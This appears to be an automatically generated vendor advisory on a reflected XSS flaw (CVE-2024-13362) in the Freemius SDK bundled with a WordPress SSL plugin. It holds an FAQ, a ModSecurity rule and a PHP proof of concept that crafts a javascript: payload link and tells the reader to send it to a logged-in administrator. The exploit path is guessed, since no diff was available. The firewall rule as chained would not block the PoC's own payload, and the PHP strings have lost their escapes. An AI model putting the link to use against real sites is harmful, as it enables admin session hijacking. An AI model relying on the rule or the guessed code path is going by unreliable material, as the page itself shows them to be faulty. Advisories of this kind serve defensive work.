What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius SDK library version 2.10.1 and below. It allows unauthenticated attackers to inject arbitrary scripts through the ‘url’ parameter, which can execute if a user clicks a malicious link.

Who is affected by this vulnerability?

This vulnerability affects users of the WP Lets Encrypt SSL plugin version 7.7.0 and any other WordPress plugins or themes that bundle the vulnerable Freemius SDK. Administrators using these plugins should assess their installations for potential exposure.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if you are using the WP Lets Encrypt SSL plugin version 7.7.0 or earlier. Additionally, review your site’s code for any usage of the ‘url’ parameter in the context of Freemius SDK to identify if it is improperly sanitized.

What are the practical implications of the CVSS score?

The CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability may not directly compromise server integrity, it can lead to significant risks in a WordPress admin context. Successful exploitation can result in session hijacking or unauthorized access to sensitive site functions.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Freemius SDK to version 2.10.2 or later, which includes fixes for this issue. Additionally, ensure proper input sanitization and output encoding are implemented in your code to prevent script injection.

What does a reflected XSS vulnerability mean?

Reflected XSS occurs when an attacker crafts a malicious link that includes a script payload in a URL parameter. When a user clicks this link, the script executes immediately in their browser, potentially allowing the attacker to perform actions in the context of the user’s session.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by crafting a link with a malicious ‘url’ parameter. When a logged-in administrator clicks this link, the JavaScript payload executes, showcasing the risk of arbitrary script execution in the user’s browser.

What are the potential consequences of exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This can lead to serious consequences, including session hijacking, credential theft, and unauthorized changes to the site.

What should I do if I cannot update the Freemius SDK?

If updating the Freemius SDK is not possible, consider implementing additional security measures such as disabling the affected plugin or using a web application firewall to filter out malicious requests. Additionally, educate users about the risks of clicking unknown links.

How does input sanitization prevent this vulnerability?

Input sanitization involves cleaning user inputs to remove potentially harmful data before processing. By properly sanitizing the ‘url’ parameter, the application can prevent malicious scripts from being executed, thereby mitigating the risk of XSS vulnerabilities.

Is this vulnerability unique to the Freemius SDK?

While this specific vulnerability is found in the Freemius SDK, similar vulnerabilities can exist in other plugins or themes that do not adequately sanitize user inputs. It is essential for all developers to follow best practices for input validation and output encoding.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 9, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (wp-letsencrypt-ssl)

CVE ID CVE-2024-13362

Plugin wp-letsencrypt-ssl

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 7.7.0

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting (XSS) vulnerability in the Freemius SDK library, version 2.10.1 and below, which is bundled within multiple WordPress plugins and themes. The specific affected plugin in this context is WP Lets Encrypt SSL (slug: wp-letsencrypt-ssl) version 7.7.0. The vulnerability carries a CVSS score of 6.1 (Medium) and requires user interaction (clicking a crafted link). The core issue is improper neutralization of the url parameter during web page generation, allowing arbitrary script injection.

The root cause, inferred from CWE-79 and the description, is insufficient input sanitization and output escaping of the url parameter used in DOM-based JavaScript contexts. Without a code diff, Atomic Edge analysis cannot confirm the exact code path, but the pattern is typical: the plugin reads a url parameter (likely from GET or hash fragment) and writes it directly into the DOM via innerHTML or document.write without proper encoding. The Freemius SDK commonly uses a url parameter for redirects or callback handling after authentication. This is a Reflected XSS because the payload executes immediately in the context of the user’s browser session, rather than being stored on the server.

Exploitation requires an unauthenticated attacker to craft a malicious link that includes a url parameter containing JavaScript payload, such as: https://target.com/wp-content/plugins/wp-letsencrypt-ssl/freemius/start.php?url=javascript:alert(‘XSS’). The attacker must then trick a logged-in administrator or user into clicking the link. Since the vulnerability is DOM-based, the script executes in the victim’s browser session within the WordPress admin context. The attack vector does not require any authentication or nonce, as the vulnerable code runs client-side.

Remediation requires the Freemius SDK to properly sanitize the url parameter before outputting it into the DOM. The fix should use JavaScript’s encodeURI() or encodeURIComponent() for dynamic values, or use safe DOM manipulation methods such as textContent instead of innerHTML. Additionally, server-side validation should reject non-HTTP/HTTPS schemes (e.g., javascript: or data:). The patch in version 2.10.2 or later likely implements these protections.

The impact of successful exploitation includes arbitrary JavaScript execution in the context of the victim’s WordPress admin session. This can lead to session hijacking, credential theft, installation of malicious plugins, creation of admin users, or redirection to phishing sites. The CVSS score indicates low impact to confidentiality and integrity, but in a WordPress admin context, the actual damage could be significantly higher, potentially leading to full site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# This rule blocks Reflected DOM-Based XSS via the 'url' parameter targeting Freemius SDK files.
# The rule matches specific Freemius PHP files that accept a 'url' parameter with dangerous schemes.

SecRule REQUEST_URI "@rx /(freemius|start.php|connect.php|redirect.php)" 
  "id:20262000,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter in Freemius SDK',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
  SecRule ARGS:url "@rx ^(javascript|data|vbscript):" "chain,t:none"
    SecRule ARGS:url "@rx [<>]" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates how an unauthenticated attacker can trigger XSS by tricking a user
// into clicking a crafted link. The vulnerable parameter is 'url' passed to Freemius SDK files.

$target_url = 'http://localhost/wordpress'; // CHANGE THIS to the target WordPress URL

$plugin_slug = 'wp-letsencrypt-ssl'; // The plugin that bundles Freemius SDK

// Payload: Reflected XSS using javascript: URI scheme
$malicious_url = $target_url . '/wp-content/plugins/' . $plugin_slug . '/freemius/start.php?url=javascript:alert(document.domain);//';

echo "[+] Atomic Edge CVE-2024-13362 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Crafted malicious URL:n";
echo $malicious_url . "nn";

echo "[+] Instructions: Send this link to a logged-in WordPress admin user.n";
echo "[+] When clicked, it will execute JavaScript in their browser session.n";

// Optional: Use cURL to fetch the page and confirm the parameter is reflected
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    // Check if the payload appears in the response (indicating reflection)
    if (strpos($response, 'javascript:alert') !== false) {
        echo "[+] Payload appears reflected in server response. Vulnerability confirmed (metadata-based).n";
    } else {
        echo "[-] Payload not found in raw response. May be DOM-only or require JavaScript execution.n";
    }
} else {
    echo "[-] HTTP request failed with code: $http_coden";
}

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius SDK library version 2.10.1 and below. It allows unauthenticated attackers to inject arbitrary scripts through the ‘url’ parameter, which can execute if a user clicks a malicious link.
Who is affected by this vulnerability?
Identifying affected users
This vulnerability affects users of the WP Lets Encrypt SSL plugin version 7.7.0 and any other WordPress plugins or themes that bundle the vulnerable Freemius SDK. Administrators using these plugins should assess their installations for potential exposure.
How can I check if my site is vulnerable?
Assessment steps
To check if your site is vulnerable, verify if you are using the WP Lets Encrypt SSL plugin version 7.7.0 or earlier. Additionally, review your site’s code for any usage of the ‘url’ parameter in the context of Freemius SDK to identify if it is improperly sanitized.
What are the practical implications of the CVSS score?
Understanding risk levels
The CVSS score of 6.1 indicates a medium severity level, suggesting that while the vulnerability may not directly compromise server integrity, it can lead to significant risks in a WordPress admin context. Successful exploitation can result in session hijacking or unauthorized access to sensitive site functions.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Freemius SDK to version 2.10.2 or later, which includes fixes for this issue. Additionally, ensure proper input sanitization and output encoding are implemented in your code to prevent script injection.
What does a reflected XSS vulnerability mean?
Explaining reflected XSS
Reflected XSS occurs when an attacker crafts a malicious link that includes a script payload in a URL parameter. When a user clicks this link, the script executes immediately in their browser, potentially allowing the attacker to perform actions in the context of the user’s session.
What is the proof of concept for this vulnerability?
Demonstrating the issue
The proof of concept demonstrates how an attacker can exploit the vulnerability by crafting a link with a malicious ‘url’ parameter. When a logged-in administrator clicks this link, the JavaScript payload executes, showcasing the risk of arbitrary script execution in the user’s browser.
What are the potential consequences of exploitation?
Impact of successful attacks
If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This can lead to serious consequences, including session hijacking, credential theft, and unauthorized changes to the site.
What should I do if I cannot update the Freemius SDK?
Alternative mitigation strategies
If updating the Freemius SDK is not possible, consider implementing additional security measures such as disabling the affected plugin or using a web application firewall to filter out malicious requests. Additionally, educate users about the risks of clicking unknown links.
How does input sanitization prevent this vulnerability?
Role of input sanitization
Input sanitization involves cleaning user inputs to remove potentially harmful data before processing. By properly sanitizing the ‘url’ parameter, the application can prevent malicious scripts from being executed, thereby mitigating the risk of XSS vulnerabilities.
Is this vulnerability unique to the Freemius SDK?
Scope of the vulnerability
While this specific vulnerability is found in the Freemius SDK, similar vulnerabilities can exist in other plugins or themes that do not adequately sanitize user inputs. It is essential for all developers to follow best practices for input validation and output encoding.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations